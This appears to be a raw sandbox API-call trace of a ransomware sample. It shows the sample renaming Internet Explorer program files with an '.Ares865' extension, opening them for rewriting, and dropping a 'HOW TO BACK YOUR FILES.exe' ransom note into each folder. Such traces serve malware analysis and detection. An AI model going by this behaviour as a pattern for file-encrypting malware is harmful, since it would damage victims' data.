[0139.599] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll" (normalized: "c:\\program files (x86)\\internet explorer\\iedvtool.dll"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\iedvtool.dll.ares865"), dwFlags=0x1) returned 1 [0139.605] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\iedvtool.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\iedvtool.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0139.605] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=860160) returned 1 [0140.024] lstrcpyW (in: lpString1=0x2cce452, lpString2="ieinstal.exe" | out: lpString1="ieinstal.exe") returned="ieinstal.exe" [0140.024] lstrlenW (lpString="ieinstal.exe") returned 12 [0140.024] lstrlenW (lpString="Ares865") returned 7 [0140.024] lstrcmpiW (lpString1="tal.exe", lpString2="Ares865") returned 1 [0140.024] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe.Ares865") returned 61 [0140.024] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe" (normalized: "c:\\program files (x86)\\internet explorer\\ieinstal.exe"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\ieinstal.exe.ares865"), dwFlags=0x1) returned 1 [0140.043] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\ieinstal.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.043] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=373248) returned 1 [0140.156] lstrcpyW (in: lpString1=0x2cce452, lpString2="ielowutil.exe" | out: lpString1="ielowutil.exe") returned="ielowutil.exe" [0140.156] lstrlenW (lpString="ielowutil.exe") returned 13 [0140.156] lstrlenW (lpString="Ares865") returned 7 [0140.156] lstrcmpiW (lpString1="til.exe", lpString2="Ares865") returned 1 [0140.157] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe.Ares865") returned 62 [0140.157] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe" (normalized: "c:\\program files (x86)\\internet explorer\\ielowutil.exe"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\ielowutil.exe.ares865"), dwFlags=0x1) returned 1 [0140.159] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\ielowutil.exe.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\ielowutil.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.160] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=115712) returned 1 [0140.170] lstrcpyW (in: lpString1=0x2cce452, lpString2="ieproxy.dll" | out: lpString1="ieproxy.dll") returned="ieproxy.dll" [0140.171] lstrlenW (lpString="ieproxy.dll") returned 11 [0140.171] lstrlenW (lpString="Ares865") returned 7 [0140.171] lstrcmpiW (lpString1="oxy.dll", lpString2="Ares865") returned 1 [0140.171] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll.Ares865") returned 60 [0140.171] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieproxy.dll"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\ieproxy.dll.ares865"), dwFlags=0x1) returned 1 [0140.173] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\ieproxy.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\ieproxy.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.173] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=163328) returned 1 [0140.202] lstrcpyW (in: lpString1=0x2cce452, lpString2="IEShims.dll" | out: lpString1="IEShims.dll") returned="IEShims.dll" [0140.202] lstrlenW (lpString="IEShims.dll") returned 11 [0140.202] lstrlenW (lpString="Ares865") returned 7 [0140.202] lstrcmpiW (lpString1="ims.dll", lpString2="Ares865") returned 1 [0140.202] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll.Ares865") returned 60 [0140.202] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieshims.dll"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\ieshims.dll.ares865"), dwFlags=0x1) returned 1 [0140.205] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\IEShims.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\ieshims.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.206] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=200704) returned 1 [0140.219] lstrcpyW (in: lpString1=0x2cce452, lpString2="iexplore.exe" | out: lpString1="iexplore.exe") returned="iexplore.exe" [0140.219] lstrlenW (lpString="iexplore.exe") returned 12 [0140.219] lstrlenW (lpString="Ares865") returned 7 [0140.219] lstrcmpiW (lpString1="ore.exe", lpString2="Ares865") returned 1 [0140.219] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe.Ares865") returned 61 [0140.219] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe.ares865"), dwFlags=0x1) returned 1 [0140.221] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.222] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=673040) returned 1 [0140.285] lstrcpyW (in: lpString1=0x2cce452, lpString2="jsdbgui.dll" | out: lpString1="jsdbgui.dll") returned="jsdbgui.dll" [0140.285] lstrlenW (lpString="jsdbgui.dll") returned 11 [0140.285] lstrlenW (lpString="Ares865") returned 7 [0140.285] lstrcmpiW (lpString1="gui.dll", lpString2="Ares865") returned 1 [0140.285] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll.Ares865") returned 60 [0140.285] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll" (normalized: "c:\\program files (x86)\\internet explorer\\jsdbgui.dll"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\jsdbgui.dll.ares865"), dwFlags=0x1) returned 1 [0140.288] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\jsdbgui.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\jsdbgui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.288] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=524288) returned 1 [0140.338] lstrcpyW (in: lpString1=0x2cce452, lpString2="jsdebuggeride.dll" | out: lpString1="jsdebuggeride.dll") returned="jsdebuggeride.dll" [0140.338] lstrlenW (lpString="jsdebuggeride.dll") returned 17 [0140.338] lstrlenW (lpString="Ares865") returned 7 [0140.338] lstrcmpiW (lpString1="ide.dll", lpString2="Ares865") returned 1 [0140.338] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll.Ares865") returned 66 [0140.338] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll" (normalized: "c:\\program files (x86)\\internet explorer\\jsdebuggeride.dll"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\jsdebuggeride.dll.ares865"), dwFlags=0x1) returned 1 [0140.341] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\jsdebuggeride.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\jsdebuggeride.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.341] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=122880) returned 1 [0140.360] lstrcpyW (in: lpString1=0x2cce452, lpString2="JSProfilerCore.dll" | out: lpString1="JSProfilerCore.dll") returned="JSProfilerCore.dll" [0140.360] lstrlenW (lpString="JSProfilerCore.dll") returned 18 [0140.360] lstrlenW (lpString="Ares865") returned 7 [0140.360] lstrcmpiW (lpString1="ore.dll", lpString2="Ares865") returned 1 [0140.361] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll.Ares865") returned 67 [0140.361] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll" (normalized: "c:\\program files (x86)\\internet explorer\\jsprofilercore.dll"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\jsprofilercore.dll.ares865"), dwFlags=0x1) returned 1 [0140.369] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\JSProfilerCore.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\jsprofilercore.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.369] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=119808) returned 1 [0140.386] lstrcpyW (in: lpString1=0x2cce452, lpString2="jsprofilerui.dll" | out: lpString1="jsprofilerui.dll") returned="jsprofilerui.dll" [0140.386] lstrlenW (lpString="jsprofilerui.dll") returned 16 [0140.386] lstrlenW (lpString="Ares865") returned 7 [0140.386] lstrcmpiW (lpString1="rui.dll", lpString2="Ares865") returned 1 [0140.386] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll.Ares865") returned 65 [0140.386] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll" (normalized: "c:\\program files (x86)\\internet explorer\\jsprofilerui.dll"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\jsprofilerui.dll.ares865"), dwFlags=0x1) returned 1 [0140.388] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\jsprofilerui.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\jsprofilerui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.388] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=353280) returned 1 [0140.411] lstrcpyW (in: lpString1=0x2cce452, lpString2="msdbg2.dll" | out: lpString1="msdbg2.dll") returned="msdbg2.dll" [0140.411] lstrlenW (lpString="msdbg2.dll") returned 10 [0140.411] lstrlenW (lpString="Ares865") returned 7 [0140.411] lstrcmpiW (lpString1="bg2.dll", lpString2="Ares865") returned 1 [0140.411] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll.Ares865") returned 59 [0140.411] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll" (normalized: "c:\\program files (x86)\\internet explorer\\msdbg2.dll"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\msdbg2.dll.ares865"), dwFlags=0x1) returned 1 [0140.413] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\msdbg2.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\msdbg2.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.413] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=265720) returned 1 [0140.439] lstrcpyW (in: lpString1=0x2cce452, lpString2="pdm.dll" | out: lpString1="pdm.dll") returned="pdm.dll" [0140.439] lstrlenW (lpString="pdm.dll") returned 7 [0140.439] lstrlenW (lpString="Ares865") returned 7 [0140.439] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\pdm.dll.Ares865") returned 56 [0140.439] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\pdm.dll" (normalized: "c:\\program files (x86)\\internet explorer\\pdm.dll"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\pdm.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\pdm.dll.ares865"), dwFlags=0x1) returned 1 [0140.442] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\pdm.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\pdm.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.442] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=355832) returned 1 [0140.497] lstrcpyW (in: lpString1=0x2cce452, lpString2="SIGNUP" | out: lpString1="SIGNUP") returned="SIGNUP" [0140.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7948 [0140.497] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f2030 [0140.497] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7950 | out: ListHead=0x2e7710, ListEntry=0x2e7950) returned 0x2e7930 [0140.497] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bc0b7dd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8bc0b7dd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8bc0b7dd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2e600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0140.497] lstrcmpiW (lpString1="sqmapi.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0140.497] lstrcmpiW (lpString1="sqmapi.dll", lpString2="aoldtz.exe") returned 1 [0140.497] lstrcpyW (in: lpString1=0x2cce452, lpString2="sqmapi.dll" | out: lpString1="sqmapi.dll") returned="sqmapi.dll" [0140.497] lstrlenW (lpString="sqmapi.dll") returned 10 [0140.497] lstrlenW (lpString="Ares865") returned 7 [0140.497] lstrcmpiW (lpString1="api.dll", lpString2="Ares865") returned -1 [0140.498] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll.Ares865") returned 59 [0140.498] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files (x86)\\internet explorer\\sqmapi.dll"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\sqmapi.dll.ares865"), dwFlags=0x1) returned 1 [0140.500] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\sqmapi.dll.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\sqmapi.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.500] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=189952) returned 1 [0140.513] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP") returned="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP" [0140.513] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP" | out: lpString1="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP") returned="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP" [0140.514] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0140.514] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\internet explorer\\signup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0140.514] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0140.515] GetLastError () returned 0x0 [0140.516] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0140.516] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x53284360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53284360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0140.516] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0140.516] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0140.516] lstrcpyW (in: lpString1=0x2cce460, lpString2="install.ins" | out: lpString1="install.ins") returned="install.ins" [0140.516] lstrlenW (lpString="install.ins") returned 11 [0140.516] lstrlenW (lpString="Ares865") returned 7 [0140.517] lstrcmpiW (lpString1="all.ins", lpString2="Ares865") returned -1 [0140.517] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins.Ares865") returned 67 [0140.517] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files (x86)\\internet explorer\\signup\\install.ins"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\signup\\install.ins.ares865"), dwFlags=0x1) returned 1 [0140.525] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\SIGNUP\\install.ins.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\signup\\install.ins.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.525] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=460) returned 1 [0140.528] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Internet Explorer\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Internet Explorer\\en-US") returned="C:\\Program Files (x86)\\Internet Explorer\\en-US" [0140.529] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Internet Explorer\\en-US" | out: lpString1="C:\\Program Files (x86)\\Internet Explorer\\en-US") returned="C:\\Program Files (x86)\\Internet Explorer\\en-US" [0140.529] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0140.529] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0140.529] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0140.530] GetLastError () returned 0x0 [0140.530] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0140.530] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x53284360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53284360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0140.530] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0140.530] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0140.531] lstrcpyW (in: lpString1=0x2cce45e, lpString2="hmmapi.dll.mui" | out: lpString1="hmmapi.dll.mui") returned="hmmapi.dll.mui" [0140.531] lstrlenW (lpString="hmmapi.dll.mui") returned 14 [0140.531] lstrlenW (lpString="Ares865") returned 7 [0140.531] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0140.531] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\en-US\\hmmapi.dll.mui.Ares865") returned 69 [0140.531] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\hmmapi.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\hmmapi.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\hmmapi.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\hmmapi.dll.mui.ares865"), dwFlags=0x1) returned 1 [0140.533] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\hmmapi.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\hmmapi.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.533] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0140.537] lstrcpyW (in: lpString1=0x2cce45e, lpString2="iedvtool.dll.mui" | out: lpString1="iedvtool.dll.mui") returned="iedvtool.dll.mui" [0140.537] lstrlenW (lpString="iedvtool.dll.mui") returned 16 [0140.537] lstrlenW (lpString="Ares865") returned 7 [0140.537] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0140.537] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\en-US\\iedvtool.dll.mui.Ares865") returned 71 [0140.538] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\iedvtool.dll.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iedvtool.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\iedvtool.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iedvtool.dll.mui.ares865"), dwFlags=0x1) returned 1 [0140.539] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\iedvtool.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\iedvtool.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.539] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28672) returned 1 [0140.543] lstrcpyW (in: lpString1=0x2cce45e, lpString2="ieinstal.exe.mui" | out: lpString1="ieinstal.exe.mui") returned="ieinstal.exe.mui" [0140.543] lstrlenW (lpString="ieinstal.exe.mui") returned 16 [0140.543] lstrlenW (lpString="Ares865") returned 7 [0140.543] lstrcmpiW (lpString1="exe.mui", lpString2="Ares865") returned 1 [0140.544] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Internet Explorer\\en-US\\ieinstal.exe.mui.Ares865") returned 71 [0140.544] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\ieinstal.exe.mui" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\ieinstal.exe.mui"), lpNewFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\ieinstal.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\ieinstal.exe.mui.ares865"), dwFlags=0x1) returned 1 [0140.545] CreateFileW (lpFileName="C:\\Program Files (x86)\\Internet Explorer\\en-US\\ieinstal.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\internet explorer\\en-us\\ieinstal.exe.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0140.545] GetFileSizeEx (in: 